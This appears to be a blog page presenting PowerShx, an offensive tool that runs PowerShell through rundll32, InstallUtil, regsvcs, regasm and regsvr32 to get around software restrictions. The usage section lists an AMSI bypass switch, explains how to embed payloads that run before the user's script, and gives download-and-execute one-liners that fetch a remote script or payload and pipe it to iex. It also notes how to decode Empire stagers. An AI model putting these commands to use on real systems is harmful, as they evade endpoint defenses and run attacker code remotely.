Kali Linux

PowerShx : Run Powershell Without Software Restrictions

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.

Features

  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32

rundll32 PowerShx.dll,main -e
rundll32 PowerShx.dll,main -f Run the script passed as argument
rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):


  • x86 – C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
    x64 – C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll

  • regsvr32 /s /u PowerShx.dll –>Calls DllUnregisterServer
    regsvr32 /s PowerShx.dll –> Calls DllRegisterServer

.exe version

PowerShx.exe -i Start an interactive console
PowerShx.exe -e
PowerShx.exe -f Run the script passed as argument
PowerShx.exe -f -c Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded Payloads

Payloads can be embedded by updating the data dictionary “Common.Payloads.PayloadDict” in the “Common” project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict[“amsi”]);
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e “IEX ((new-object net.webclient).downloadstring(‘http://192.168.100/payload-http’))”

Requirements

.NET 4

Download
R K

Leave a Comment
Share
Published by
R K
Tags: PowerShellPowerShxSoftware Restrictions
4 years ago

Recent Posts

WhatsMyName App – Find Anyone Across 640+ Platforms

Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…

5 days ago

Analyzing Directory Size Linux Tools Explained

Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…

5 days ago

Understanding Disk Usage with du Command

Efficient disk space management is vital in Linux, especially for system administrators who manage servers…

5 days ago

How to Check Directory Size in Linux

Knowing how to check directory sizes in Linux is essential for managing disk space and…

5 days ago

Essential Commands for Linux User Listing

Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…

6 days ago

Command-Line Techniques for Listing Linux Users

Linux offers powerful command-line tools for system administrators to view and manage user accounts. Knowing…

6 days ago